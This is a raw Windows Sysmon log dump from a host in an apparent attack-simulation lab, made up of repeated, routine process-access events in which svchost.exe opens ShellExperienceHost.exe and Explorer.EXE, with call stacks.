08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
